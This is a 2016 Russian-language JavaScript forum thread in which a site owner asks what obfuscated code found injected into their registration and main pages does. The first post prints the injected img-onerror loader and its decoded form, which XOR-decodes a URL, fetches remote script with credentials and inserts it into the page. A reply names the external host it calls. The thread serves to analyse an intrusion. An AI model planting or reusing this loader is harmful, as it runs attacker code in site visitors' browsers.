Javascript-форум (https://javascript.ru/forum/)
-   Оффтопик (https://javascript.ru/forum/offtopic/)
-   -   Подскажите что это... Нид Хелп (https://javascript.ru/forum/offtopic/63268-podskazhite-chto-ehto-nid-khelp.html)

au_23 27.05.2016 16:31

Подскажите что это... Нид Хелп
 
Донный код был найден на некоторых страницах сайта... помогите! что это? может кто сталкивался. найден был на страницах регистрации, главной, и еже некоторых... был в таком виде
<!-- image81java -->
<img src="image" onerror="a = new Function(String.fromCharCode(
10, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 
10, 32, 32, 118, 97, 114, 32, 107, 101, 121, 32, 61, 32, 39, 107, 
99, 65, 70, 120, 53, 52, 100, 116, 75, 79, 115, 53, 54, 57, 53, 
82, 112, 112, 102, 90, 100, 100, 80, 49, 66, 88, 84, 103, 78, 100, 
71, 67, 115, 117, 113, 101, 114, 108, 67, 110, 107, 104, 87, 73, 
50, 69, 97, 113, 90, 82, 67, 105, 78, 113, 74, 70, 71, 73, 105, 
119, 108, 76, 122, 114, 110, 78, 109, 49, 84, 101, 76, 78, 72, 100, 
117, 49, 82, 121, 80, 77, 98, 87, 53, 70, 84, 116, 73, 113, 52, 106, 
79, 67, 79, 68, 121, 55, 87, 81, 78, 106, 87, 121, 89, 56, 88, 
73, 84, 74, 52, 112, 53, 75, 55, 97, 81, 50, 81, 48, 55, 99, 
120, 65, 113, 82, 104, 90, 100, 120, 49, 109, 82, 74, 117, 120, 
77, 74, 112, 108, 71, 103,......

я его перевел и получилось вот что:
(function(){

var key='kcAFx54dtKOs5695RppfZddP1BXTgNdGCsuqerlCnkhWI2EaqZRCiNqJFGIiwlLzrnNm1TeLNHdu1RyPMbW5FTtIq4j
         OCODy7WQNjWyY8XITJ4p5K7aQ2Q07cxAqRhZdx1mRJuxMJplGgJpFoExuwHbKOLhTP5kL1ckhGyaXZ1Yq9kNL4qG
         yBs4YdrEL3yPwYj6uEVKK';
var enced='Axc1NkIaGxQVLC4dXBhbUH0DBAcuF0snVCA5OA40ATVsGhgWUkVCMwYb';

function xor_enc(string,key){

varres='';

for(var i=0 ; i <string.length;i++){
var x=String.fromCharCode(string.charCodeAt(i)^key.charCodeAt(i));
res+=x;
}
returnres;
}

enced = atob(enced);
var dec =xor_enc(enced,key);
//console.log(dec);
var LINK=dec;

functiongetCode(cb){
varx = new XMLHttpRequest();
x.open ('GET',LINK);
x.withCredentials = true;

x.onreadystatechange=function(){
if(x.readyState==4&&x.status==200){
//	console.log(x.responseText);
	varjs=x.responseText;
	vars=document.createElement('script');
	s.innerHTML=js;
	document.body.appendChild(s);
}
};

x.send();
}
getCode();

})();

Decode 27.05.2016 18:02

au_23, шлет кросс-доменный GET-запрос по этому адресу: http://pagani.be/stats/webalizer/img77.php. При успешном ответе сервера вставляет на страницу тег <script> с каким-то содержимым.


Часовой пояс GMT +3, время: 09:19.